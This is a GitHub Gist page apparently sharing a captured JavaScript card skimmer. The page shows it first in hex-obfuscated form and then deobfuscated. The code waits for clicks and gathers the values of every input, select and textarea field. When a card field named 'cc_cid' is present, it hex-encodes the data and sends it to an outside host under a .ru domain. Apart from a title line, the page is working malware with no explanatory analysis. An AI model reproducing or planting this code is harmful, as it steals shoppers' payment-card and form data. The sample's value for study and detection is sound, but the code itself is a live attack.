-
-
Save krautface/aed463ec9c5a3aa444a10dffeba295c3 to your computer and use it in GitHub Desktop.
A simple skimmer with hex encoded values
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var _0xf97f=["\x63\x6C\x69\x63\x6B","","\x6C\x65\x6E\x67\x74\x68","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x3D","\x26","\x65\x78\x65\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x68\x65\x6C\x6C\x73\x6E\x2E\x72\x75\x2F\x64\x2E\x70\x68\x70\x3F\x64\x3D","\x6F\x62\x73\x65\x72\x76\x65"];Event[_0xf97f[12]](document,_0xf97f[0],function(){function _0xd841x1(_0xd841x2){var _0xd841x3=_0xf97f[1];for(var _0xd841x4=0;_0xd841x4< _0xd841x2[_0xf97f[2]];_0xd841x4++){_0xd841x3+= _0xf97f[1]+ _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16)};return _0xd841x3}var _0xd841x5=_0xf97f[1];var _0xd841x2=/cc_cid/;for(var _0xd841x6=document[_0xf97f[5]](_0xf97f[4]),_0xd841x4=0;_0xd841x4< _0xd841x6[_0xf97f[2]];_0xd841x4++){if(_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]]> 0){var _0xd841x7=_0xd841x6[_0xd841x4][_0xf97f[7]];_0xf97f[1]== _0xd841x7&& (_0xd841x7= _0xd841x4),_0xd841x5+= _0xd841x7+ _0xf97f[8]+ _0xd841x6[_0xd841x4][_0xf97f[6]]+ _0xf97f[9]}};if(_0xd841x2[_0xf97f[10]](_0xd841x5)){ new Ajax.Request(_0xf97f[11]+ _0xd841x1(_0xd841x5))}}); |
The above, but deobfuscated through beautifier.io
var _0xf97f = [
"click",
"",
"length",
"charCodeAt",
"input, select, textarea, checkbox",
"querySelectorAll",
"value",
"name",
"=",
"&",
"exec",
"https://shellsn.ru/d.php?d=",
"observe"
];
Event[_0xf97f[12]](document, _0xf97f[0], function() {
function _0xd841x1(_0xd841x2) {
var _0xd841x3 = _0xf97f[1];
for (var _0xd841x4 = 0; _0xd841x4 < _0xd841x2[_0xf97f[2]]; _0xd841x4++) {
_0xd841x3 += _0xf97f[1] + _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16);
}
return _0xd841x3;
}
var _0xd841x5 = _0xf97f[1];
var _0xd841x2 = /cc_cid/;
for (
var _0xd841x6 = document[_0xf97f[5]](_0xf97f[4]), _0xd841x4 = 0; _0xd841x4 < _0xd841x6[_0xf97f[2]]; _0xd841x4++
) {
if (_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]] > 0) {
var _0xd841x7 = _0xd841x6[_0xd841x4][_0xf97f[7]];
_0xf97f[1] == _0xd841x7 && (_0xd841x7 = _0xd841x4),
(_0xd841x5 +=
_0xd841x7 +
_0xf97f[8] +
_0xd841x6[_0xd841x4][_0xf97f[6]] +
_0xf97f[9]);
}
}
if (_0xd841x2[_0xf97f[10]](_0xd841x5)) {
new Ajax.Request(_0xf97f[11] + _0xd841x1(_0xd841x5));
}
});
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
The above, but beautified